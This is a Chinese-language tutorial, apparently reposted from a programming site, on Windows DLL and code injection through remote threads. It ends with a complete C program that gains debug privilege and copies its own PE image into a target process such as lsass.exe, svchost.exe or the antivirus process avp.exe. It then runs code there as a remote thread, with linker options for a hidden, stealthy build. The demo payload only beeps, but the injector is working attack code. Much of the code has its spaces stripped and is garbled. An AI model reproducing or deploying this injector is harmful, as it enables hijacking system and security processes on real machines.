? ? ? 所謂DLL注入就是將一個DLL放進某個進程的地址空間里，讓它成為那個進程的一部分。要實現DLL注入，首先需要打開目標進程。

hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|//允許遠程創建線程

PROCESS_VM_OPERATION|//允許遠程VM操作

PROCESS_VM_WRITE,//允許遠程VM寫

FALSE,dwRemoteProcessId)

由于我們后面需要寫入遠程進程的內存地址空間并建立遠程線程，所以需要申請足夠的權限（PROCESS_CREATE_THREAD、VM_OPERATION、VM_WRITE）。

如果進程打不開，以后的操作就別想了。進程打開后，就可以建立遠線程了，不過別急，先想想這個遠線程的線程函數是什么？我們的目的是注入一個DLL。而且我們知道用LoadLibrary可以加載一個DLL到本進程的地址空間。于是，自然會想到如果可以在目標進程中調用LoadLibrary，不就可以把DLL加載到目標進程的地址空間了嗎？對！就是這樣。遠線程就在這兒用了一次，建立的遠線程的線程函數就是LoadLibrary，而參數就是要注入的DLL的文件名。(這里需要自己想一想，注意到了嗎，線程函數ThreadProc和LoadLibrary函數非常相似，返回值，參數個數都一樣)還有一個問題，LoadLibrary這個函數的地址在哪兒？也許你會說，這個簡單，GetProcAddress就可以得出。于是代碼就出來了。

char*pszLibFileRemote="my.dll";

PTHREAD_START_ROUTINEpfnStartAddr=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("Kernel32"),"LoadLibraryA");

CreateRemoteThread(hRemoteProcess,NULL,0,pfnStartAddr,pszLibFileRemote,0,NULL);

但是不對！不要忘了，這是遠線程，不是在你的進程里，而pszLibFileRemote指向的是你的進程里的數據，到了目標進程，這個指針都不知道指向哪兒去了，同樣pfnStartAddr這個地址上的代碼到了目標進程里也不知道是什么了，不知道是不是你想要的LoadLibraryA了。但是，問題總是可以解決的，Windows有些很強大的API函數，他們可以在目標進程里分配內存，可以將你的進程中的數據拷貝到目標進程中。因此pszLibFileRemote的問題可以解決了。

char*pszLibFileName="my.dll";//注意，這個一定要是全路徑文件名，除非它在系統目錄里；原因大家自己想想。

//計算DLL路徑名需要的內存空間

intcb=(1+lstrlenA(pszLibFileName))*sizeof(char);

//使用VirtualAllocEx函數在遠程進程的內存地址空間分配DLL文件名緩沖區

pszLibFileRemote=(char*)VirtualAllocEx(hRemoteProcess,NULL,cb,MEM_COMMIT,PAGE_READWRITE);

//使用WriteProcessMemory函數將DLL的路徑名復制到遠程進程的內存空間

iReturnCode=WriteProcessMemory(hRemoteProcess,pszLibFileRemote,(PVOID)pszLibFileName,cb,NULL);

OK，現在目標進程也認識pszLibFileRemote了，但是pfnStartAddr好像不好辦，我怎么可能知道LoadLibraryA在目標進程中的地址呢？其實Windows為我們解決了這個問題，LoadLibraryA這個函數是在Kernel32.dll這個核心DLL里的，而這個DLL很特殊，不管對于哪個進程，Windows總是把它加載到相同的地址上去。因此你的進程中LoadLibraryA的地址和目標進程中LoadLibraryA的地址是相同的(其實，這個DLL里的所有函數都是如此)。至此，DLL注入結束了。

[cpp]

/*

遠程注入explorer.exe，不停Beep,注入完就退出。

*/

#include<windows.h>

#include<stdio.h>

#include<tlhelp32.h>

#include<Shlwapi.h>

#include<tchar.h>

#pragmacomment(lib,"Shlwapi.lib")

#pragmacomment(linker,"/BASE:0x14000000")

//#defineNoWindow

#ifdefNoWindow

#pragmacomment(linker,"/subsystem:windows/FILEALIGN:0x200/ENTRY:main")

#pragmacomment(linker,"/INCREMENTAL:NO/IGNORE:4078")

#pragmacomment(linker,"/MERGE:.idata=.text/MERGE:.data=.text/MERGE:.rdata=.text/MERGE:.text=Anskya/SECTION:Anskya,EWR")

#endif

typedefint(__stdcall*fnMessageBoxA)(HWND,LPCSTR,LPCSTR,UINT);

typedefint(__stdcall*fnBeep)(int,int);

#defineProcessName"services.exe"http://"rundll32.exe"http://"svchost.exe"http://"explorer.exe"http://"avp.exe"http://"lsass.exe"http://

//

//根據進程名，獲得進程ID

DWORDGetProcessID(char*FileName)

{

HANDLEhProcess;

PROCESSENTRY32pe;

BOOLbRet;

//進行進程快照

hProcess=::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

//開始進程查找

bRet=::Process32First(hProcess,&pe);

//循環比較，得出ProcessID

while(bRet)

{

if(strcmp(FileName,pe.szExeFile)==0)

returnpe.th32ProcessID;

else

bRet=::Process32Next(hProcess,&pe);

}

//返回得到的ProcessID

//printf("Processnotfound!\n");

return9999;

}

//

//遠程注入函數www.2cto.com

void__stdcallRmoteThread()

{

HMODULEhMod,hMod2;

fnMessageBoxAmyMessageBoxA;

fnBeepmyBeep;

char*path[MAX_PATH];

hMod=GetModuleHandle("user32.dll");

hMod2=GetModuleHandle("kernel32.dll");

myMessageBoxA=(fnMessageBoxA)GetProcAddress(hMod,(LPCSTR)"MessageBoxA");

myBeep=(fnBeep)GetProcAddress(hMod2,(LPCSTR)"Beep");

/*for(inti=0;i<30;i++)

{

myBeep(800,400);

}

*/

//while(1)

for(inti=0;i<6;i++)

{

Beep(600,100);

Sleep(200);

}

GetModuleFileName(NULL,(char*)path,MAX_PATH);

//myMessageBoxA(NULL,(char*)path,NULL,64);

}

//

//提升應用級調試權限

BOOLEnablePrivilege(HANDLEhToken,LPCTSTRszPrivName,BOOLfEnable)

{

TOKEN_PRIVILEGEStp;

tp.PrivilegeCount=1;

LookupPrivilegeValue(NULL,szPrivName,&tp.Privileges[0].Luid);

tp.Privileges[0].Attributes=fEnable?SE_PRIVILEGE_ENABLED:0;

AdjustTokenPrivileges(hToken,FALSE,&tp,sizeof(tp),NULL,NULL);

return((GetLastError()==ERROR_SUCCESS));

}

//

///說明:插入代碼,遠程線程為RmoteThread()

///參數:Pid=進程PID

///返回:成功True,否則False

boolInjectExe(DWORDPid)

{

boolstatus=false;

LPVOIDpBaseAddr=NULL;

HMODULEhMod=GetModuleHandle(NULL);

LONGhNHOffset=PIMAGE_DOS_HEADER(hMod)->e_lfanew;

HANDLEhThread,

hProcess,

hToken;

DWORDcbImage;

//cbImage=內存中整個PE映像體的尺寸

cbImage=PIMAGE_NT_HEADERS((DWORD)hMod+(DWORD)hNHOffset)->OptionalHeader.SizeOfImage;

//重要，否則不能注入lsass

OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken);

EnablePrivilege(hToken,SE_DEBUG_NAME,TRUE);

hProcess=OpenProcess(PROCESS_ALL_ACCESS,TRUE,Pid);

if(hProcess==NULL)

{

#ifdefdebug

MessageBoxA(NULL,"錯誤OpenProcess",NULL,64);

#endif

gotoErr;

}

//釋放遠程內存

VirtualFreeEx(hProcess,LPVOID(hMod),0,MEM_RELEASE);

//分配遠程內存

pBaseAddr=VirtualAllocEx(hProcess,LPVOID(hMod),cbImage,MEM_COMMIT|MEM_RESERVE,

PAGE_EXECUTE_READWRITE);

if(pBaseAddr==NULL)

{

#ifdefdebug

MessageBoxA(NULL,"VirtualAllocExfailed",NULL,64);

#endif

gotoErr;

}

//寫進去,將本進程的整個PE體全寫進目標進程，夠狠～

if(!WriteProcessMemory(hProcess,pBaseAddr,LPVOID(hMod),cbImage,NULL))

{

#ifdefdebug

MessageBoxA(NULL,"WriteProcessMemoryfailed",NULL,64);

#endif

gotoErr;

}

hThread=CreateRemoteThread(hProcess,NULL,NULL,\

(LPTHREAD_START_ROUTINE)&RmoteThread,NULL,NULL,NULL);

if(hThread==NULL)

{

#ifdefdebug

MessageBoxA(NULL,"CreateRemoteThreadfailed",NULL,64);

#endif

gotoErr;

}

//WaitForSingleObject(hThread,INFINITE);

CloseHandle(hThread);

CloseHandle(hProcess);

status=TRUE;

returnstatus;//自己返回就行，不要VirtualFreeEx;，否則宿主就掛了!

Err:

if(pBaseAddr!=NULL)

VirtualFreeEx(hProcess,pBaseAddr,0,MEM_RELEASE);

if(hProcess!=NULL)

CloseHandle(hProcess);

returnstatus;

}

//

intmain()

{

charaa[]="aBcDdddFFFFasfd";

strupr((char*)aa);

printf(aa);

if(!InjectExe(GetProcessID(ProcessName)))

Beep(1800,500);

return0;

}